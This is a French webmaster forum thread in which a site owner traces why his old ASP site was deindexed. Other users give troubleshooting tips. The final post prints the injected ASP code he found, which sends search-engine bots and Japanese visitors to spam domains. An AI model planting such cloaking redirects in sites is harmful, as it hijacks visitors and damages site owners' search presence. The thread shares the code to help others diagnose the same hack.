Hacking sur la page vue par Google Bot (non WP)

Discussion dans 'Problèmes de référencement spécifiques à vos sites' créé par oxedet, 1 Août 2021.

  1. oxedet
    oxedet Nouveau WRInaute
    Inscrit:
    29 Septembre 2006
    Messages:
    8
    J'aime reçus:
    0
    Bonjour,
    J'ai mon site qui s'est littéralement effondré en quelques semaines (toutes les pages ont été déréférencées). En cause : un hacking sur la page vue par Google Bot (autres bots ou accès direct : pas de pb). C'est un vieux site en asp dont je maîtrise la totalité du code et je ne trouve aucune trace de script douteux, pourtant j'ai bien identifié un piratage en janvier dernier. Il est sous IIS/Windows. Quelqu'un a-t-il une piste ?
    lien : https://annuaire-equestre.com
    PS : c'est pas mon gagne-pain, mais il a 17 ans d'age, ça me fait mal au coeur de le voir dans cet état...
    Merci d'avance
    Cordialement
    Laurent
     
  2. Marie-Aude
    Marie-Aude WRInaute accro
    Inscrit:
    5 Juin 2006
    Messages:
    16 431
    J'aime reçus:
    22
  3. rick38
    rick38 WRInaute passionné
    Inscrit:
    23 Février 2013
    Messages:
    1 776
    J'aime reçus:
    269
    Oui il y a aucune page sauf la home, donc un peu normal que tout soit déréférencé...
     
  4. oxedet
    oxedet Nouveau WRInaute
    Inscrit:
    29 Septembre 2006
    Messages:
    8
    J'aime reçus:
    0
    Oops, erreur de ma part (je me prends les pieds dans mes configs à force de chercher)... la navigation "normal" est revenue mais le problème persiste...
    upload_2021-8-2_13-8-4.png
    Merci
     
  5. oxedet
    oxedet Nouveau WRInaute
    Inscrit:
    29 Septembre 2006
    Messages:
    8
    J'aime reçus:
    0
  6. emualliug
    emualliug WRInaute occasionnel
    Inscrit:
    1 Février 2020
    Messages:
    360
    J'aime reçus:
    71
    Si le site est propre il faut attendre qu'il soit à nouveau crawlé et indexé. La page d'accueil de ton site en cache chez Google remonte 27 juil. 2021 19:56:19. Je suppose que le nettoyage est postérieur. Le reste, c'est de l'attente. Demander une réindexation de la home via la searchconsole si ce n'est déjà fait.
     
  7. Marie-Aude
    Marie-Aude WRInaute accro
    Inscrit:
    5 Juin 2006
    Messages:
    16 431
    J'aime reçus:
    22
  8. oxedet
    oxedet Nouveau WRInaute
    Inscrit:
    29 Septembre 2006
    Messages:
    8
    J'aime reçus:
    0
    Merci, j'ai effectivement demandé une ré indexation il y a quelques jours, sans insister... Cependant, sur un "test en direct de l'url" depuis la search console, la réponse est maintenant pire : j'ai un 404 ! :-( je vais devenir chèvre...
     
  9. oxedet
    oxedet Nouveau WRInaute
    Inscrit:
    29 Septembre 2006
    Messages:
    8
    J'aime reçus:
    0
    Oui, ça été ma preuve que quelque chose a bougé : l'encodage des pages, pourtant en UTF8 de bout en bout, a été perturbé. Je suis obligé de réencoder les contenus (la grande majorité issue de la BDD) à la volée... (je viens de le faire sur ces pages).
     
  10. spout
    spout WRInaute accro
    Inscrit:
    14 Mai 2003
    Messages:
    9 176
    J'aime reçus:
    327
    Le hack est toujours là :

    upload_2021-8-3_8-41-31.png
     
  11. cthierry
    cthierry WRInaute passionné
    Inscrit:
    15 Janvier 2005
    Messages:
    2 322
    J'aime reçus:
    67
    En effet Spout : https://www.webrankinfo.com/outils/...equestre.com/annuaire/repertoire&ua=googlebot

    Perso je commence par rechercher si il n'y a pas un "daiku" qui traine sur la bdd, les fichiers du site, en espérant que le mec a pas encodé sa merde. Ensuite, test en local ou sur autre serveur pour vérifier que ce n'est pas ce dernier qui est vérolé. Car si tu as déjà nettoyé et que le problème est toujours là, c'est qu'il y a une porte ouverte quelque part.
     
  12. oxedet
    oxedet Nouveau WRInaute
    Inscrit:
    29 Septembre 2006
    Messages:
    8
    J'aime reçus:
    0
    Trouvé !
    voici ci-dessous, pour info, le code injecté dans un des fichiers includes, il est explicite dans sa finalité...
    - je cherchai dans mes fichiers par date de modification (au alentour du 16/01/2021) mais celui-ci est resté daté de 2017, contournement système...
    - dans son injection, le fichier était passé d'UTF8 à UTF8BOM d'où les perturbations d'affichages
    Conclusion : j'aurai pas du jouer en finesse et republier sans me poser de questions tout mes fichiers de codes depuis ma source sûre...
    Conclusion2 : ça m'a obligé à épurer toutes les pages des trucs inutiles (JS FB, OneSignal, FontAwesome...)
    Conclusion3 : il faut maintenant que je remonte à la faille originelle, mais là j'ai ma petite idée.

    Merci à tous !

    Code:
    <%
    function Getbot()
    dim s_agent
    GetBot=""
    s_agent=Request.ServerVariables("HTTP_USER_AGENT")
    if instr(1,s_agent,"googlebot",1) > 0 then
    GetBot="google"
    end if
    if instr(1,s_agent,"baiduspider",1) > 0 then
    GetBot="baidu"
    end if
    if instr(1,s_agent,"slurp",1) > 0 then
    GetBot="Yahoo"
    end if
    if instr(1,s_agent,"Bingbot",1) > 0 then
    GetBot="Bing"
    end if
    if instr(1,s_agent,"sougouspider",1) > 0 then
    GetBot="sougou"
    end if
    end function
    if GetBot="baidu" or GetBot="google" or GetBot="yahoo" or GetBot="360" then
    
    Response.Redirect "[URL]http://daiku.co.jp/form/ovus/buy_74wxn.html[/URL]"
    else
    
    end if
    if instr(Request.ServerVariables("http_referer"),"google.co.jp")>0 then
    '
    response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")
    '
    end if
    
    if instr(Request.ServerVariables("http_referer"),"yahoo.co.jp")>0 then
    '
    response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")
    '
    end if
    
    if instr(Request.ServerVariables("http_referer"),"docomo.ne.jp")>0 then
    '
    response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")
    '
    end if
    
    Dim Language
    
    Language=Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")
    
    If InStr(Language,"ja")>0 Or InStr(Language, "jp")>0 then
    
    response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")
    
    end if
    
    %>
     
    #13 oxedet, 3 Août 2021
    Dernière édition par un modérateur: 4 Août 2021
Chargement...
Similar Threads - Hacking vue Google Forum Date
99% arrive sur des pages 404 suite hacking Problèmes de référencement spécifiques à vos sites 15 Décembre 2016
Se former au Growth Hacking? Débuter en référencement 5 Décembre 2016
wordpress et le hacking Développement d'un site Web ou d'une appli mobile 4 Janvier 2015
Problème hacking Wordpress - fichiers wp-sample.php et wp-admin/wp-user.php Débuter en référencement 30 Avril 2014
Hacking du site et redirection vers un autre Problèmes de référencement spécifiques à vos sites 16 Décembre 2011
hacking wordpress 3.2.1 avec changement de .htacess Administration d'un site Web 27 Novembre 2011
Hacking sur ma home Administration d'un site Web 23 Novembre 2011
tentative de hacking ou pas ? Administration d'un site Web 10 Janvier 2011
WordPress Analytics, Vues et Wordpress Google Analytics 21 Avril 2021
80k page vues /jour mais seulement 1,5k sur adsense AdSense 21 Avril 2021